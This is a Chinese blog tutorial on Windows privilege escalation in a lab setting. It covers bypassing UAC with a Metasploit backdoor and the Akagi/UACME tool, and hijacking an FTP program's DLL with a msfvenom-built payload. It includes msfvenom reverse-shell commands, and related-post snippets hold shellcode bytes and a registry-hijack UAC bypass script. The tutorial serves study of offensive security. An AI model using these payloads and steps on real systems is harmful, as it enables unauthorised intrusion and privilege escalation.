Windows提权&BypassUAC&Dll劫持

已于 2024-12-31 14:56:05 修改
阅读量1.1k 收藏 20
点赞数 25
CC 4.0 BY-SA版权
文章标签: windows 学习方法 网络安全 系统安全 web安全 计算机网络
于 2024-01-17 19:28:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_39953838/article/details/135649522
本文介绍了如何在Windows10环境中通过MSF和Akagi工具绕过UAC,以及如何使用DLL劫持技术在Web权限下获取更高权限。作者详细描述了从生成后门文件、上传、提权到利用DLL文件替换实现最终目标的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

此文章仅用于学习交流,作者不为此承担任何责任,一切违法活动造成后果自负。

一:环境

        win10+开启了UAC(默认开启)

        win10+web+安装了一些程序,运行时会加载dll

二:BypassUac提权

        UAC全称为 User Account Control,用户账户控制,在win7以后的产品都是有这个东西的。这个东西就是在我们打开一些程序时候,会弹出一些提示。

        思考:当我们取得shell后,我们要运行一些程序,但是打开的时候我们在shell中看不到提示,所以我们就要绕过UAC,使得直接就可以运行程序。

MSF+Akagi绕过UAC

        我们首先使用msf生成一个后门文件,上传到被攻击机中,模拟已经上线。

         生成后门程序。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.246.128 LPORT=4444 -f exe -o f.exe

        上传到被攻击机

        设置msf监听。

        上线msf,查看当前权限为administrators,我们提权到system。

        我们使用自动提权getsystem,发现直接报错,提不上

        其实到这里我们可以用msf自带的模块去绕过UAC,但是我自己尝试了很多个都是没有session的产生也不知道为啥。

        所以我们使用MSF+Akagi来绕过UAC

        Akagi为编译好的UACME项目

        UACME项目地址: https://github.com/hfiref0x/UACME

        我们提前把Akagi.exe上传到被攻击机。

        然后在msf中使用它去执行msf的后门文件,同时我们再开一个msf监听。

        Akagi64.exe使用命令:

                                             Akagi64.exe 绕过方法编号   #执行system权限的cmd

                                              Akagi64.exe 绕过方法编号  后门地址  #运行指定的程序

        可以看到新开的MSF上线了。

        我们直接提权成功。

    

二:DLL劫持

        我们首先模拟取得了web权限,发现c盘下安装的ftp软件

        如果说web权限对其他目录没有RW权限,这个dll劫持就不会成功。

        我们通过信息搜集找到了版本信息,在自己电脑上下载此程序。

        我们下载之后使用火绒剑进行分析,看程序在执行时候加载了什么dll。

        系统文件我们不能更改,我们只能利用数字签名文件或者未知文件。

        然后我们再用工具验证一下,可以看到他让我们尝试。

        使用msf生成一个dll文件,上传到服务器,替换原来的dll文件。

        上传替代原来的dll文件,这里我把原来dll文件名改成了321,我们上传的替代原来的。

        然后msf起一个监听,在被攻击机中重新运行程序。

        此时msf就上线了,我们msf生成的dll文件在程序启动时被启用了就。

最后:

        一个姑娘,如果有被人喜欢,而且那个人喜欢的干干净净,怎么都是一件好事!

升——windows进程注入&令牌窃取&土豆&BypassUAC&DLL文件劫持&不带引号服务路径
m0_61506558的博客
01-15 1020
RottenPotato (烂土豆)的原理可以简述如下: 1.欺骗“NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。 2.对这个认证过程使用中间人攻击(NTLM重放),为“NTAUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通过—系列的Windows API调用实现的。 3.模仿这个令牌。只有具有“模仿安全令牌限”的账户才能去模仿别人的令牌。一般大多数的服务型账户(IIS、MSSQL等)有这个限,大多数用户级的账户没有这个限。
红队内网攻防渗透:内网渗透之内网对抗:Windows升篇&UAC绕过&DLL劫持&未引号路径&可控服务&全检项目
HACKONE的博客
06-17 285
原理:Windows程序启动的时候需要DLL。由于管理配置错误,用户可能对服务拥有过多的限,例如,可以直接修改它导致重定向执行文件。检测:火绒剑 利用火绒剑进行进程分析加载DLL,DLL文件要在软件自身的目录里,这里使用进程查看工具发现了两个自身目录的dll。但是如果路径是有空格的 且没有双引号,程序会认为第一个空格处是程序自身,后面的其他空格代表程序的参数。过程:信息收集-进程调试-制作dll并上传-替换dll-等待启动应用成功。过程:检测服务限配置-制作文件并上传-更改服务路径指向-调用后成功。
dll劫持
qq_46804551的博客
05-04 6609
aheadlib工具劫持 可以看见生成了一个cpp文件,然后我们创建一个dll文件 将生成的cpp文件替换到如下文件 添加#include “pch.h” 填加如下代码 /* cs的payload length: 892 bytes */ unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b
Windows -服务_DLL 劫持
weixin_42410566的博客
05-10 80
本文通过 Google 翻译这篇文章所产生,本人仅是对机器翻译中部分表达别扭的字词进行了校正及个别注释补充。
DLL搜索的目录顺序(DLL劫持
WLINX
08-23 1466
DLL劫持是技术当一个可执行文件运行时,Windows加载器将可执行模块映射到进程的地址空间中,加载器分析可执行模块的输入表,并设法找出任何需要的DLL,并将它们映射到进程的地址空间中。由于输入表中只包含DLL名而没有它的路径名,因此加载程序必须在磁盘上搜索DLL文件。首先会尝试从当前程序所在的目录加载DLL,如果没找到,则在Windows系统目录中查找,最后是在环境变量中列出的各个目录下查找。(...
_DLL劫持
草木
11-23 1810
1.通过火绒剑分析进程 分析进程调用模块,找到可以利用的dll文件,本次试验劫持idmmkb.dll文件 2.MSF生成后门dll木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.61.131 lport=8888 -f dll >C:\Users\Ninja\Desktop\idmmkb.dll 3.上传替换 4.MSF监听 >use exploit/multi/handler >set payload
Windows升—BypassUAC、DLL劫持、引号路径、服务限等
2301_79985178的博客
05-13 174
这里的图片我借用一下其它博客的,由于我自己电脑以及其它电脑,虚拟机都没有这样的路径。次序执行。
技术之Bypass UAC
weixin_42071117的博客
10-19 999
// UAC(用户账户控制)是微软在Windows VISTA以后版本中引入的一种安全机制。通过UAC,应用程序和任务始终在非管理员限下的安全上下文中运行。 // 除非特别授予管理员限。UAC可以阻止未经授的应用程序自动进行安装,并防止无意地更改系统设置。 // UAC需要授的动作包括:配置Windows Update、增加或删除用户账户、更改用户账户的类型、改变UAC设置、安装ActiveX、安装或移除程序、安装设备驱动程序、 // 设置家长控制、将文件移动或复制到Program File或Wi
[网络安全自学篇] 九十四.《Windows黑客编程技术详解》之技术(令牌升和Bypass UAC)
热门推荐
杨秀璋的专栏
09-12 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充相关知识点。第六篇文章主要介绍木马病毒技术,包括进程访问令牌升和Bypass UAC,希望对您有所帮助。
DLL劫持生成器.exe
05-21
一键生成DLL文件函数。
DLL劫持示例程序:EXE+DLL
07-03
1. 这是本人编写的DLL劫持演示程序,整个解决方案中包含三个工程:EXE主调程序、DLL被调程序、DLL劫持程序。 2. 本解决方案是基于VS2005开发的。
windows工具
01-15
可以对win2K3-win2012 server进行 win7也可以,win10没试过
绕过UAC
weixin_45007073的博客
05-31 1350
UAC简介UAC授操作UAC的设置要求bypassuac模块RunAs模块Invoke-PsUACme模块 简介 UAC是微软为系统安全性中引入的技术。UAC要求用户在执行可能影响计算机运行的操作或者在进行可能影响其他用户的设置之前,拥有相应的限或者管理员密码。UAC在操作启动前对用户身份进行验证,以避免恶意软件和间谍软件在未经许可的情况下在计算机上进行安装操作或者对计算机设置进行修改。 微软设置的安全控制策略,分为高、中、低三个等级。高等级的进程有管理员限;中等级的进程有普通管理员限;低等
bypassUAC
yangbz123的博客
06-07 1735
目录Windows UAC概述UAC结构图UAC组件描述UAC滑块设置UAC可授的控制漏洞UAC之MSF1、bypassuac2、bypassuac_eventvwr3、RunAsUAC之Empire1、bapassuac模块2、bapassuac_wscript模块UAC之CSUAC之powershell参考文献 Windows UAC概述 用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作
Dll劫持
SHELLCODE_8BIT的博客
12-01 752
dll劫持_. iDea.的博客-优快云博客_dll劫持
通过Bypass UAC进行
渗透之路,攻防之间皆学问
01-30 6898
用户账户控制(User Account control,UAC)是windows系统采用的一种控制机制,可以阻止自动安装未经授的应用 并防止意外更改系统设置,有助于防止恶意软件损坏计算机。用户账户控制程序使应用程序和任务始终在非管理员账户的安全上下文中运行,除非管理员专门授管理员级别的限。开启用户账户控制后,每个需要使用管理员访问令牌的应用都必须征得用户同意。UAC限制所有用户包括非RID500的管理员用户使用标准用户登录到他们的计算机,并在标准用户的安全性上下文中访问资源和运行应用。
蚁剑集成了哪些功能 文件管理 DB操作 bypassUAC 虚拟终端
最新发布
07-03
<think>嗯,用户询问的是蚁剑的四个核心功能模块:文件管理、数据库操作、绕过UAC和虚拟终端。需要结合专业渗透测试工具的知识来回答,但要注意强调合法使用原则。 用户之前讨论过Shiro反序列化漏洞,现在突然转向渗透测试工具功能,可能是想了解攻击面扩展或防御措施。不过当前问题很明确是工具功能解析,需聚焦技术细节。 关于文件管理模块,蚁剑的实现类似FTP客户端,但支持高级功能如编辑二进制文件。数据库操作模块的关键在于支持多种数据库协议转换,这点需要突出。绕过UAC其实依赖的是系统漏洞或配置缺陷,回答时要避免教唆语气。虚拟终端部分要强调其与系统原生终端的差异。 注意到引用[1]到蚁剑的合法性要求,这很重要,必须在每个功能模块说明后都强调合法使用。技术上可以补充些实现原理,比如绕过UAC的常见技术如DLL劫持或计划任务滥用,但不必展开具体攻击步骤。 最后生成的三个问题要延续工具功能主题:检测方法对应防御,功能扩展考虑实际需求,限维持则是渗透测试的关键阶段。这样既能解答当前问题,又引导用户思考防御视角。</think>以下是蚁剑(AntSword)核心功能模块的详细解析,涵盖文件管理、数据库操作、绕过UAC及虚拟终端功能: --- ### 一、文件管理模块 蚁剑通过Webshell实现远程文件系统的完全控制: 1. **基础操作** - 可视化目录树浏览、文件上传/下载(支持断点续传) - 文件编辑(文本/十六进制编辑器)、重命名、删除、限修改(如Linux的`chmod`) - 实时搜索(支持正则表达式匹配文件名和内容)[^1] 2. **高级功能** - **压缩解压**:支持ZIP/TAR/GZ等格式的打包与解包 - **哈希计算**:快速获取文件的MD5/SHA1等哈希值 - **远程编辑**:直接修改服务器配置文件(如`web.config`、`.htaccess`) ```python # 示例:蚁剑通过Webshell执行文件下载的底层逻辑 webshell.execute("file_put_contents('malware.zip', base64_decode('UEsDBBQ...'))"); ``` --- ### 二、数据库操作模块 支持主流数据库的直连管理: | 数据库类型 | 功能亮点 | 关键技术实现 | |------------|------------------------------|------------------------------| | MySQL | 可视化SQL执行、数据导出为CSV | `mysqli`/`PDO`扩展调用 | | MSSQL | 执行存储过程、XP_CMDSHELL调用| `sqlsrv_connect()`连接 | | Oracle | PL/SQL调试、表空间管理 | OCI8接口 | | SQLite | 嵌入式数据库直接读写 | `sqlite3_open()`操作 **典型场景**: - 执行SQL语句注入攻击后的数据导出 - 通过数据库写Webshell(如MySQL的`INTO OUTFILE`) - 数据库凭据取(从配置文件中获取连接信息)[^1] --- ### 三、绕过UAC(用户账户控制) 针对Windows系统的升技术: 1. **技术原理** - 利用Windows白名单程序(如`fodhelper.exe`)的自动机制 - 修改注册表劫持COM对象(如`HKCU\Software\Classes\CLSID`注入) 2. **蚁剑实现方式** - 自动生成PowerShell脚本,通过Webshell执行 - 利用`cmstp.exe`(微软连接管理器)绕过UAC ```powershell # 示例:通过注册表劫持绕过UAC New-Item -Path "HKCU:\Software\Classes\CLSID\{...}\InprocServer32" -Force Set-ItemProperty -Path "..." -Name "(Default)" -Value "C:\payload.dll" ``` --- ### 四、虚拟终端(Virtual Terminal) 模拟系统Shell环境的核心模块: - **跨平台支持**: - Windows:调用`cmd.exe`/`powershell.exe` - Linux:基于`/bin/bash`或`/bin/sh` - **核心特性**: - 实时交互式命令执行(支持管道符`|`和重定向`>`) - 伪终端(PTY)支持(解决Linux系统无TTY的问题) - 会话保持(后台维持Shell连接) - **安全绕过能力**: - 禁用历史记录(Linux:`unset HISTFILE`) - 绕过命令审计(如Windows ETW绕过) --- ### 五、防护建议(针对上述功能) 1. **服务器加固**: - 禁用危险函数(如PHP的`system()`、`exec()`) - 文件限最小化(限制`www-data`用户写入限) 2. **入侵检测**: - 监控异常进程(如`powershell`执行Base64命令) - 审计注册表敏感路径修改行为 3. **应用层防护**: - Webshell指纹识别(使用RASP或WAF) - 数据库操作行为审计(如异常的`INTO OUTFILE`语句) > **重要声明**:蚁剑仅限合法授场景使用(如渗透测试、教育研究),禁止未授入侵[^1]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值